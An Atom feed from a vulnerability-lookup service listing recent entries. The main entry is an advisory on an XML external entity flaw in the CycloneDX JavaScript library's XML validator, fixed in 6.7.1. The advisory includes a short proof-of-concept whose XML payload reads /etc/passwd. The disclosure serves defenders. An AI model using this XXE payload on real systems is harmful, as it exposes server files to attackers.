<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-07T13:09:49.112349+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-5461</id>
    <title>EUVD-2026-5461</title>
    <updated>2026-10-07T13:09:49.114980+00:00</updated>
    <content>EUVD-2026-5461</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-5461"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2024-34345</id>
    <title>fkie_cve-2024-34345</title>
    <updated>2026-10-07T13:09:49.115040+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>The CycloneDX JavaScript library contains the core functionality of OWASP CycloneDX for JavaScript. In 6.7.0, XML External entity injections were possible, when running the provided XML Validator on arbitrary input. This issue was fixed in version 6.7.1.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2024-34345"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-38gf-rh2w-gmj7</id>
    <title>GHSA-38gf-rh2w-gmj7 — @cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability</title>
    <updated>2026-10-07T13:09:49.115084+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: @cyclonedx/cyclonedx-library</p>
<p>### Impact</p>
<p>XML External entity injections could be possible, when running the provided XML Validator on arbitrary input.</p>
<p>#### POC</p>
<p>```js
const {
  Spec: { Version },
  Validation: { XmlValidator }
} = require('@cyclonedx/cyclonedx-library');</p>
<p>const version = Version.v1dot5;
const validator = new XmlValidator(version);
const input = `&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;!DOCTYPE poc [
  &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;
]&gt;
&lt;bom xmlns="http://cyclonedx.org/schema/bom/1.5"&gt;
  &lt;components&gt;
    &lt;component type="library"&gt;
      &lt;name&gt;testing&lt;/name&gt;
      &lt;version&gt;1.337&lt;/version&gt;
      &lt;licenses&gt;
        &lt;license&gt;
          &lt;id&gt;&amp;xxe;&lt;/id&gt;&lt;!-- &lt;&lt; XML external entity (XXE) injection --&gt;
        &lt;/license&gt;
      &lt;/licenses&gt;
    &lt;/component&gt;
  &lt;/components&gt;
&lt;/bom&gt;`;</p>
<p>// validating this forged(^) input might lead to unintended behaviour
// for the fact that the XML external entity would be taken into account.
validator.validate(input).then(ve =&gt; {
  console.error('validation error', ve);
});
```</p>
<p>### Patches</p>
<p>This issue was fixed in `@cyclonedx/cyclonedx-library@6.7.1 `.</p>
<p>### Workarounds</p>
<p>Do not run the provided XML validator on untrusted inputs.</p>
<p>### References</p>
<p>* issue was introduced via &lt;https://github.com/CycloneDX/cyclonedx-javascript-library/pull/1063&gt;.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-38gf-rh2w-gmj7"/>
  </entry>
</feed>
